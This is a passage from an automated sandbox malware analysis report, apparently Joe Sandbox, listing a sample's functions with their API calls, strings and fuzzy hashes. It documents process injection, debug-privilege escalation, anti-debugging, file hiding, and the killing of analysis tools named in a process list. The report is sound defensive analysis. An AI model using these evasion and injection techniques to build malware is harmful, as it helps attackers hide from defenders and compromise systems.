OpenProcessToken.ADVAPI32 ref: 00007FF79E38415E
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF79E384186
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF79E3841B1
CloseHandle.KERNEL32 ref: 00007FF79E3841BC
OpenProcess.KERNEL32 ref: 00007FF79E3841D1
WaitForSingleObject.KERNEL32 ref: 00007FF79E38422C
CloseHandle.KERNEL32 ref: 00007FF79E384249

Strings

SeDebugPrivilege, xrefs: 00007FF79E38417D

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
String ID: SeDebugPrivilege
API String ID: 2379135442-2896544425
Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction ID: 77233013c4ecf5b924ad07673eb064b1a4dc79779acc63b9261fbe98346e3315
Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction Fuzzy Hash: 9D415E3251CA8186E760DB61F48836AF7A1FBC4754F90413CEA9946E98CFBDD448CF60

Function 00007FF79E383E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF79E383E37
Process32FirstW.KERNEL32 ref: 00007FF79E383E6A
CloseHandle.KERNEL32 ref: 00007FF79E383E7C

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction ID: 943cd27ebc5417e8b7cde1b9962fb94e4984ee03cd0507eabaf8e9a0a7df2e91
Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction Fuzzy Hash: 53210031A0CA8681E770EB26E8C836AE361FFD4B54F90423DC55E826A8DF3DD455CB60

Function 00007FF79E382CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF79E382D6F
WriteProcessMemory.KERNEL32 ref: 00007FF79E382DC1
VirtualProtectEx.KERNEL32 ref: 00007FF79E382DF7

Strings

@, xrefs: 00007FF79E382D54

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Virtual$AllocMemoryProcessProtectWrite
String ID: @
API String ID: 4073123320-2766056989
Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction ID: 46f509d6d3de4db944c8a1d6fb43fa095122eeeaf3700ac9716c1fcbf7815db1
Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction Fuzzy Hash: A141B232608A8586E770DB26E49436ABBE1F7C8B84F504129EA8D87B58DF7DD4488B50

Function 00007FF79E3833EC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF79E383413

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
Instruction ID: b2703330adffd0dd0919a051db70d1fa1cb0b0a53784ae9bfdff267c522893f2
Opcode Fuzzy Hash: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
Instruction Fuzzy Hash: 7BF0623190D142D6EA759A21E588379E3E1EB99758FC0113DD28C03795DB3DD6488E36

Function 00007FF79E3846E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF79E38472B
GetFileSize.KERNEL32 ref: 00007FF79E38474C
GetProcessHeap.KERNEL32 ref: 00007FF79E384762
RtlAllocateHeap.NTDLL ref: 00007FF79E38477B
CloseHandle.KERNEL32 ref: 00007FF79E384793

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateHandleProcessSize
String ID:
API String ID: 2693768547-0
Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction ID: 640c4d823c7c6f5d4deb01fcf0acb97dcae6c338938c810ca3239bc6ffa364a4
Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction Fuzzy Hash: 2C81D132608B8186DB74DB65F48436AF7A1FBC9B91F504139EA9D83B68DF7CD0458B20

Function 00007FF79E3830DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79E3845C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E38460C
Part of subcall function 00007FF79E3845C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E384649
Part of subcall function 00007FF79E3845C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E384654

Part of subcall function 00007FF79E383B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E38311C), ref: 00007FF79E383BC7
Part of subcall function 00007FF79E383B84: RegSetValueExW.ADVAPI32 ref: 00007FF79E383BFD
Part of subcall function 00007FF79E383B84: RegCloseKey.ADVAPI32 ref: 00007FF79E383C0C

Part of subcall function 00007FF79E383C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF79E383C3C

Part of subcall function 00007FF79E383E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF79E383E37

Part of subcall function 00007FF79E383E24: Process32FirstW.KERNEL32 ref: 00007FF79E383E6A
Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383E7C

Part of subcall function 00007FF79E383E24: wcscmp.MSVCRT ref: 00007FF79E383E91
Part of subcall function 00007FF79E383E24: OpenProcess.KERNEL32 ref: 00007FF79E383EA7
Part of subcall function 00007FF79E383E24: TerminateProcess.KERNEL32 ref: 00007FF79E383ECA
Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383ED8
Part of subcall function 00007FF79E383E24: Process32NextW.KERNEL32 ref: 00007FF79E383EEB
Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383EFD

Part of subcall function 00007FF79E3839B4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79E383B0C), ref: 00007FF79E3839E4

Sleep.KERNEL32 ref: 00007FF79E3831C6

Strings

idaq64.exe, xrefs: 00007FF79E38317E
procexp64.exe, xrefs: 00007FF79E38315A
Services, xrefs: 00007FF79E3831B5
procmon.exe, xrefs: 00007FF79E3831A2
autoruns.exe, xrefs: 00007FF79E383196
TOTALCMD.exe, xrefs: 00007FF79E383166
ProcessHacker.exe, xrefs: 00007FF79E383142
idaq.exe, xrefs: 00007FF79E38318A
x64dbg.exe, xrefs: 00007FF79E383172
procexp.exe, xrefs: 00007FF79E38314E

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
API String ID: 2853470409-928700279
Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction ID: 52b3f02c5ce18e7261b0d118b1b8c1ffbeb265c646865affe9df2e2356497e85
Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction Fuzzy Hash: 3F216261A1C94291EA24FB30E8D11B8E2A1AFA0754FD0563DE42D876F7DF6CF909C670

Function 00007FF79E382E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF79E382E85
ReleaseMutex.KERNEL32 ref: 00007FF79E382E9D
CloseHandle.KERNEL32 ref: 00007FF79E382EA8
GetLastError.KERNEL32 ref: 00007FF79E382EB5
ReleaseMutex.KERNEL32 ref: 00007FF79E382EC7
CloseHandle.KERNEL32 ref: 00007FF79E382ED2

Strings

rbNSpGEsyb, xrefs: 00007FF79E382E70

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID: rbNSpGEsyb
API String ID: 299056699-189039185
Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction ID: e5ac6380751b41f8d0dc1260d70012094d10b48566fc6d6e36bc0f02a2c7517d
Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction Fuzzy Hash: 8F01002290CA01C2E730EB31E8C4269A771FBECB94F84013DE94E82674CF7CE6958631

Function 00007FF79E382F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF79E382F1E
ReleaseMutex.KERNEL32 ref: 00007FF79E382F36
CloseHandle.KERNEL32 ref: 00007FF79E382F41
GetLastError.KERNEL32 ref: 00007FF79E382F4E
ReleaseMutex.KERNEL32 ref: 00007FF79E382F60
CloseHandle.KERNEL32 ref: 00007FF79E382F6B

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction ID: f8c056f43b564445872a0a698dc18f977ef4d589583c2e47be0439c601d23342
Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction Fuzzy Hash: 4A01DA2691CA42C2E730EB32E88426DA371FFE9B45F80013DE98E82674CF6CD954C631

Function 00007FF79E383CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF79E383D01
PathFindFileNameW.SHLWAPI ref: 00007FF79E383D14
wcslen.MSVCRT ref: 00007FF79E383D2A
wcsncpy.MSVCRT ref: 00007FF79E383DEF

Strings

Unknown, xrefs: 00007FF79E383DE0

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: FileName$FindModulePathwcslenwcsncpy
String ID: Unknown
API String ID: 4220601557-1654365787
Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction ID: 963f6558a3e8c8fe41807d2d55b1a75cc2718abf8446be7d55abac809a551387
Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction Fuzzy Hash: DD31B87661CAC485D770EB29E8D87AAB3A1F788740F400239DA9D83B68DF3CD554CB20

Function 00007FF79E383B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E38311C), ref: 00007FF79E383BC7
RegSetValueExW.ADVAPI32 ref: 00007FF79E383BFD
RegCloseKey.ADVAPI32 ref: 00007FF79E383C0C

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00007FF79E383B88
Hidden, xrefs: 00007FF79E383B94

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: CloseOpenValue
String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
API String ID: 779948276-85274793
Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction ID: 799acfa859202b951d01e3b3350b1c2595ae39989276c80c86e364ecaaa21f22
Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction Fuzzy Hash: 6601A576618A808AD7A0DB24F88471AB7B4F788794F901239EB8D43B68DF7DC145CB24

Function 00007FF79E384004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF79E384022
Process32FirstW.KERNEL32 ref: 00007FF79E384054
wcscmp.MSVCRT ref: 00007FF79E38406B
CloseHandle.KERNEL32 ref: 00007FF79E3840A1

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
String ID:
API String ID: 2850635065-0
Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction ID: 4105243a2fe8dc9743df0fdc55b0590d194b3995f690c65414f17ed2bdfe8aeb
Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction Fuzzy Hash: 7F11FE71A0CA8681E770EB21E4C836BE3A1FBD4754F90423DD6AD82A98DF7DD504CB60

Function 00007FF79E382F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79E3838C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38390D
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383922
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383935
Part of subcall function 00007FF79E3838C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383945
Part of subcall function 00007FF79E3838C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383958
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E38396D
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995

Part of subcall function 00007FF79E3846E4: CreateFileW.KERNEL32 ref: 00007FF79E38472B

Part of subcall function 00007FF79E3840E4: GetCurrentProcess.KERNEL32 ref: 00007FF79E38414B
Part of subcall function 00007FF79E3840E4: OpenProcessToken.ADVAPI32 ref: 00007FF79E38415E
Part of subcall function 00007FF79E3840E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF79E384186
Part of subcall function 00007FF79E3840E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF79E3841B1
Part of subcall function 00007FF79E3840E4: CloseHandle.KERNEL32 ref: 00007FF79E3841BC
Part of subcall function 00007FF79E3840E4: OpenProcess.KERNEL32 ref: 00007FF79E3841D1
Part of subcall function 00007FF79E3840E4: CloseHandle.KERNEL32 ref: 00007FF79E384249

GetProcessHeap.KERNEL32 ref: 00007FF79E383037
HeapFree.KERNEL32 ref: 00007FF79E38304A

Strings

chFrWWdQWsLFevUr, xrefs: 00007FF79E382FDB
.x64, xrefs: 00007FF79E382FEE

Memory Dump Source

Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true

Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd

Similarity

API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
String ID: .x64$chFrWWdQWsLFevUr
API String ID: 3992431006-2286007224
Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction ID: 1327664bf92a784b0c602038c680800c446212eec788c87f8b0eeec3dbcb1244
Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction Fuzzy Hash: F811D670A18A8285E670FB34E8D83AAB7A1FB84744F80413DD55C87665DF7CE0598B70

Analysis Process: svchost.exePID: 2888, Parent PID: 3332COMMON

Execution Graph

Execution Coverage:	38.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	481
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF7E52B345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E52B321C: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7E52B346D), ref: 00007FF7E52B3220

ExitProcess.KERNEL32 ref: 00007FF7E52B3476
ExitProcess.KERNEL32 ref: 00007FF7E52B34D4

Strings

msiexec.exe, xrefs: 00007FF7E52B34FB
audiodg.exe, xrefs: 00007FF7E52B354C
svchost.exe, xrefs: 00007FF7E52B3497
worker_BAccdq, xrefs: 00007FF7E52B3510
worker_kBEqZh, xrefs: 00007FF7E52B3561
worker_RdDwvE, xrefs: 00007FF7E52B34BF
worker_FDhvwc, xrefs: 00007FF7E52B35CD

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

Similarity

API ID: ExitProcess$DebuggerPresent
String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
API String ID: 613740775-1953711635
Opcode ID: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
Instruction ID: 6a37a3d3dbbfe9a4201a1053f5dcbc6d8c39727c968cec8ce2592b0b5e5a105d
Opcode Fuzzy Hash: 14c2fa25876479cd5c5c4ade1a135fd90693f5b51d36c120125410f70aa3ba6a
Instruction Fuzzy Hash: 66610EA0A1CA5B81EBE4B731AC7537AA268AF9CF01FD44137D45EC61E1CE3DE5058232

Function 00007FF7E52B40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
WaitForSingleObject.KERNEL32 ref: 00007FF7E52B422C
CloseHandle.KERNEL32 ref: 00007FF7E52B4249

Strings

SeDebugPrivilege, xrefs: 00007FF7E52B417D

Memory Dump Source

Source File: 00000001.00000002.3378444857.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true

Associated: 00000001.00000002.3378315305.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378617865.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378821934.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3378966053.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3379099124.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7e52b0000_svchost.jbxd

